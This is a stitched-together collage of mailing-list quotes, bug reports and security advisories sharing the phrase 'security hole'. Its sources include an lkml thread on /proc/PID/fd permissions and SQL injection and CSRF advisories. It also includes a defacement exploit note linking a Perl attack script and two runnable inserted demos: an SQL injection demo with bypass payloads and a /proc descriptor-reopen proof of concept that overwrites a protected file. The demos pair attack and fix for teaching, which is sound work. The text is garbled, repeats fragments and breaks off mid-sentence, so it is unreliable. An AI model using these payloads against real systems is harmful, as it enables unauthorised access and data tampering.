security hole
}
#endif
- /* If this is a SETUID programme, dup /dev/null to openned stdin,
+ /* If this is a SET?ID program, dup /dev/null to openned stdin,
stdout and stderr to close a security hole described in:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:23.stdio.asc
*/
- if (getuid() != geteuid())
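Review bot: the removed `if (getuid() != geteuid())` has no replacement visible in this hunk, while the comment above it changes from SETUID to SET?ID; if the intent is to cover setgid binaries as well, the condition should become `if (getuid() != geteuid() || getgid() != getegid())`, otherwise a setgid-only program still inherits whatever stdin/stdout/stderr the caller left closed, which is the FreeBSD-SA-02:23 problem the comment cites. The added comment line also keeps the misspelling "openned" (should be "opened").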
> >guest certainly does not have permission to ptrace() pavel's
> >processes, so...
>
> But guest has permissions to ptrace() his own processes. If we
> remember your original report, he abuses input redirection of bash
> run by himself. So again, there's no real security hole here.
guest abuses ptrace permissions on his own processes to write to
pavel's files... no, that obviously is not a security hole :-).
Whatever. I agree that it is obscure, but I believe that it is
As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.
Credits: The original finder of the security hole. (Jelsoft?)
Researched & Disclosed by: MaXe (InterN0T.net)
Official Information:
http://www.vbulletin.com/forum/showthread.php?t=319572
On Sat 2009-10-24 01:24:49, Dan Yefimov wrote:
> On 24.10.2009 1:08, Pavel Machek wrote:
> >>That can hardly be called a real security hole, since the behaviour
> >>described above is expected, and is as it was conceived by design.
> >>If the file owner in fact allows writing to it, why should Linux
> >>prevent that from happening?
> >
> >No, I do not think this is expected. You could not write to that file
> >under traditional unix, and you can not write into that file when
> >/proc is unmounted.
>>> guest certainly does not have permission to ptrace() pavel's
>>> processes, so...
>>
>> But guest has permissions to ptrace() his own processes. If we
>> remember your original report, he abuses input redirection of bash
>> run by himself. So again, there's no real security hole here.
>
> guest abuses ptrace permissions on his own processes to write to
> pavel's files... no, that obviously is not a security hole :-).
>
guest abuses ptrace permissions on his own processes to write to ANY file open
>>>>> guest certainly does not have permission to ptrace() pavel's
>>>>> processes, so...
>>>>
>>>> But guest has permissions to ptrace() his own processes. If we
>>>> remember your original report, he abuses input redirection of bash
>>>> run by himself. So again, there's no real security hole here.
>>>
>>> guest abuses ptrace permissions on his own processes to write to
>>> pavel's files... no, that obviously is not a security hole :-).
>>>
>> guest abuses ptrace permissions on his own processes to write to ANY
> >>>guest certainly does not have permission to ptrace() pavel's
> >>>processes, so...
> >>
> >>But guest has permissions to ptrace() his own processes. If we
> >>remember your original report, he abuses input redirection of bash
> >>run by himself. So again, there's no real security hole here.
> >
> >guest abuses ptrace permissions on his own processes to write to
> >pavel's files... no, that obviously is not a security hole :-).
> >
> guest abuses ptrace permissions on his own processes to write to ANY
> "even i see no reason for this. these ip addresses aren't valid
> anymore. it seems that chris implemented this for a customer. i
> removed it now" (they are still in the default install image)
> "nvram unset ral
> nvram commit "
> "there is no security hole. both IPs are not active anymore and
> have been obsolete for a long time. "
> "i will lock this thread now. a new release is scheduled soon (within
> this or next week), but you cannot force me to release buggy code
> based on the current internal tree. that's my last statement on this
> topic" (Posted: Tue Aug 19, 2008 10:57 pm)
Hi all;
We have been informed that SQL-Ledger 2.8.34 has in fact been released
patching the security hole previously reported in LedgerSMB 1.2.24 and
Lower. This is an SQL injection issue.
I haven't been able to find a CVE listing for this yet. Secunia
has assigned this the id of SA45649 for LedgerSMB. I expect to send a
full disclosure email discussing the vulnerability in a week.
It is easy to see that the $_COOKIE['admin'] value is used as the argument
to the is_god() function, which gives us another critical SQL injection.
I have written a proof-of-concept blind injection exploit for this specific
case, and it works flawlessly.
Happy news for potential victims: the developer has already patched this security
hole in NukeSentinel by releasing a new version, 2.5.12
//-----> See ya soon and have a nice day ;) <-----//
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$count = mysql_num_rows($result);
--------------------------------------------------
As seen above, "$_POST['albumid']", "$_POST['startpic']" and
"$_POST['numpics']" are used in the SQL query without proper sanitization,
which points to a possible SQL injection hole.
As this script can be used only by admins, I'd classify it as
"low impact". There also seem to be more SQL injections in this
script.
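The injection pattern that both the NukeSentinel cookie finding and the gallery-script $_POST finding above describe, shown as an added example against a throw-away SQLite database. This is not the code of NukeSentinel or of the gallery script, and the table, the column names and the is_god-style check are assumptions made for the illustration; it shows the unquoted-integer case and the quoted-string case side by side with the bound-parameter fix for each.

```python
# Added example, not the code of NukeSentinel or the gallery script: the
# injection pattern both advisories describe, against a throw-away SQLite
# database.  Table and column names and the is_god-style check are
# assumptions made for the illustration.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one god-mode admin, one ordinary admin, and
    nine pictures spread over two albums."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admins(aid TEXT PRIMARY KEY, is_god INTEGER NOT NULL);
        INSERT INTO admins VALUES ('root', 1), ('helper', 0);
        CREATE TABLE pictures(pid INTEGER PRIMARY KEY, albumid INTEGER NOT NULL);
        INSERT INTO pictures(albumid) VALUES (1),(1),(1),(1),(1),(2),(2),(2),(2);
    """)
    return db


def is_god_vulnerable(db, admin_cookie: str) -> bool:
    """$_COOKIE['admin'] pasted into the query: a single quote in the cookie
    ends the string literal and the rest of the cookie becomes SQL."""
    row = db.execute(
        "SELECT is_god FROM admins WHERE aid = '" + admin_cookie + "'"
    ).fetchone()
    return bool(row and row[0])


def is_god_fixed(db, admin_cookie: str) -> bool:
    """Same lookup with a bound parameter; the cookie is data, never SQL."""
    row = db.execute(
        "SELECT is_god FROM admins WHERE aid = ?", (admin_cookie,)
    ).fetchone()
    return bool(row and row[0])


def count_pics_vulnerable(db, albumid, startpic, numpics) -> int:
    """$_POST['albumid'], ['startpic'], ['numpics'] concatenated unquoted:
    no quote is even needed, a space and an OR rewrite the WHERE clause."""
    q = (f"SELECT pid FROM pictures WHERE albumid = {albumid} "
         f"LIMIT {numpics} OFFSET {startpic}")
    return len(db.execute(q).fetchall())


def count_pics_fixed(db, albumid, startpic, numpics) -> int:
    """Require every paging value to be a plain non-negative integer and
    bind it; int() rejects '1 OR 1=1' before any SQL is built."""
    try:
        a, s, n = int(albumid), int(startpic), int(numpics)
    except (TypeError, ValueError):
        raise ValueError("albumid, startpic and numpics must be integers") from None
    if s < 0 or n < 0:
        raise ValueError("startpic and numpics must be non-negative")
    rows = db.execute(
        "SELECT pid FROM pictures WHERE albumid = ? LIMIT ? OFFSET ?",
        (a, n, s),
    ).fetchall()
    return len(rows)


def fixed_rejects(db, albumid, startpic, numpics) -> bool:
    """True when the hardened query refuses the given parameters."""
    try:
        count_pics_fixed(db, albumid, startpic, numpics)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("cookie bypass:", is_god_vulnerable(db, "x' OR is_god=1 --"))
    print("album filter bypass:", count_pics_vulnerable(db, "1 OR 1=1", "0", "10"))
    print("fixed rejects it:", fixed_rejects(db, "1 OR 1=1", "0", "10"))
```

The cookie payload `x' OR is_god=1 --` turns the lookup into a query that returns the god-mode row for a cookie that names no admin at all; the paging payload `1 OR 1=1` needs no quote because the value is spliced in as a bare number, which is why "integer" parameters are not safe merely for lacking string context. The fixed variants do the same work with bound parameters and an explicit integer check, so a malformed value is refused before the database sees it.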
clients e-mails, used it for spam and planted malware on their sites. All
due to a programming mistake of one of their programmers: WHID 2007-75:
PlusNet blames itself for webmail spamfest
(http://www.webappsec.org/projects/whid/byid_id_2007-75.shtml). Other
hosting incidents: WHID 2007-74: Web host breach may have exposed passwords
for 6,000 clients, WHID 2007-77: HostGator: cPanel Security Hole Exploited
in Mass Hack, WHID 2007-76: A large web hosting firm inflicted by mass
malware installation.
+ The first CSRF entry in WHID, and a really bad one: CSRF in g-mail cost
someone his very successful domain, stolen by a blackmailer (WHID 2007-72:
Date: Jan 08, 2008
Severity: Mild
There exists a Cross Site Scripting security hole in Joomla 1.0.13.
Background
==========
laurent.gaffie@gmail.com wrote in response to me:
>"I don't see that this is a bug. Could you explain a little more fully?"
>
>Well, configured like this by default, it's a security hole. It's a perfect
>hole for a virus, trojan, etc. You can send any malicious files to a remote
>desktop via a malicious website or even an XSS, like an executable with a
>"my computer" icon (for example...)
OK, but there's no bug in the program that's exploitable in itself. The
On 24.10.2009 1:08, Pavel Machek wrote:
>> That can hardly be called a real security hole, since the behaviour
>> described above is expected, and is as it was conceived by design.
>> If the file owner in fact allows writing to it, why should Linux
>> prevent that from happening?
>
> No, I do not think this is expected. You could not write to that file
> under traditional unix, and you can not write into that file when
> /proc is unmounted.
>
STEP3: Deface or root the server ;)
------> Infos about the Exploit
Unfortunately, the RCE is only possible once, and only after gaining access to the admin center, so choose your command carefully. (I tried to make an RFI out of it, but the results were poor because most webservers are configured against including PHP files from other webservers.)
The RCE is possible due to a security hole when you change the username: the script does not check the input, so we can manipulate it. =)
-----> The Exploit Code
Get it here:
http://virii.lu/Perl-Scripts/GB_Pwner.txt
Subject: stardict broadcasts clipboard context over network
Package: stardict
Version: 3.0.1-4.1
Justification: user security hole
Severity: grave
Tags: security
*** Please type your report below this line ***
In default config "enable net dict" is selected, it attempts to grab
This problem is not a threat because the root user is able to boot any kernel without going through the boot sequence (kexec) and is able to recover the disk encryption key by inspecting the dm-crypt module in memory. If an OS allows a user to read raw memory without being root, it's a security hole in the OS and not in GRUB
(from smrksoft website)
2009/10/30 Vendor contacted
2009/10/30 Vendor response (That's not a security hole but a feature....)
2009/10/30 Release this advisory
#####################################################################################
============================
On Oct 23, 2009, at 3:56 PM, Pavel Machek <pavel@ucw.cz> wrote:
> Demonstrate how to get access to the file with /proc unmounted and you
> have a point. Demonstrate how to get access on anything else than
> Linux and you have a point. Otherwise there's a security hole.
If the directory is mounted via NFS or is exported there are several
ways... so software written to assume directory permissions are
sufficient to protect users from other unprivileged users is broken in
general. Even if it is usually secure enough on non-Linux. It is not
J. Carlos Nieto wrote:
>
> There exists a Cross Site Scripting security hole in Joomla 1.0.13.
>
Sorry, it should be "Cross Site Request Forgery".
> guest certainly does not have permission to ptrace() pavel's
> processes, so...
But guest has permissions to ptrace() his own processes. If we remember your
original report, he abuses input redirection of bash run by himself. So again,
there's no real security hole here.
--
Sincerely Yours, Dan.
On 23.10.2009 21:16, Pavel Machek wrote:
> Hi!
>
> This is forward from lkml, so no, I did not invent this
> hole. Unfortunately, I do not think lkml sees this as a security hole,
> so...
>
> Jamie Lokier said:
>>>> a) the current permission model under /proc/PID/fd has a security
>>>> hole (which Jamie is worried about)
"even i see no reason for this. these ip addresses aren't valid
anymore. it seems that chris implemented this for a customer. i
removed it now" (they are still in the default install image)
"nvram unset ral
nvram commit "
"there is no security hole. both IPs are not active anymore and
have been obsolete for a long time. "
"i will lock this thread now. a new release is scheduled soon (within
this or next week), but you cannot force me to release buggy code
based on the current internal tree. that's my last statement on this
topic" (Posted: Tue Aug 19, 2008 10:57 pm)
As a final update to this thread: Dan Bernstein acknowledged this bug
as a security hole in djbdns and recommends that users install my
patch. A copy of his post is available at
http://marc.info/?l=djbdns&m=123613000920446&w=2.
>> itself, not to the files in it, so your pretensions are in fact
>> illegitimate.
>
> Demonstrate how to get access to the file with /proc unmounted and you
> have a point. Demonstrate how to get access on anything else than
> Linux and you have a point. Otherwise there's a security hole.
>
Did you think of creating a hardlink to the file in an unrestricted location?
That is a similar "security hole".
--
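The /proc/PID/fd reopen that this thread argues about, as an added example that is not part of any of the messages above. It assumes Linux with /proc mounted and, like the report, a file whose mode bits allow writing (0666) sitting in a directory that is then closed off; everything it touches is created in a fresh temporary directory and removed again.

```python
# Added example, not code from the thread: reopen a read-only descriptor
# for writing through /proc/self/fd/N after the parent directory has been
# made untraversable.  Assumes Linux with /proc mounted.
import os
import tempfile


def reopen_via_proc(fd: int, flags: int) -> int:
    """Open /proc/self/fd/<fd> with new flags.  Only the inode's mode bits
    are checked on this open; the directory path the fd came from is not."""
    return os.open(f"/proc/self/fd/{fd}", flags)


def run_demo() -> dict:
    """Create a 0666 file inside a temporary directory, chmod the directory
    to 000, then compare path-based access with the /proc reopen."""
    result = {"root": os.geteuid() == 0,
              "direct_ok": False, "proc_ok": False, "wrote_ok": False}
    d = tempfile.mkdtemp(prefix="procfd-")
    path = os.path.join(d, "secret")
    # Create the file and hold a read-only descriptor on it, the way a shell
    # input redirection (cmd < secret) would.
    fd = os.open(path, os.O_CREAT | os.O_RDONLY, 0o666)
    os.chmod(path, 0o666)        # make sure umask did not strip the w bits
    try:
        os.chmod(d, 0)           # directory permissions now deny traversal
        try:                     # traditional Unix: path lookup is refused
            w = os.open(path, os.O_WRONLY)
            os.close(w)
            result["direct_ok"] = True
        except PermissionError:
            pass
        try:                     # Linux with procfs: reopen through the fd
            w = reopen_via_proc(fd, os.O_WRONLY)
        except OSError:
            return result        # e.g. /proc not mounted
        try:
            result["proc_ok"] = True
            os.write(w, b"pwned\n")
        finally:
            os.close(w)
        os.lseek(fd, 0, os.SEEK_SET)
        result["wrote_ok"] = os.read(fd, 16) == b"pwned\n"
        return result
    finally:
        os.close(fd)
        os.chmod(d, 0o700)       # restore so the cleanup below can proceed
        os.unlink(path)
        os.rmdir(d)


if __name__ == "__main__":
    print(run_demo())
```

Run as an unprivileged user, the direct open fails with EACCES while the reopen through /proc succeeds and the write is visible through the original read-only descriptor; run as root both succeed, which is why the result also records whether the caller is root. With /proc unmounted the reopen raises and the function returns with proc_ok still false, which is the distinction Pavel draws above between traditional Unix and Linux with procfs.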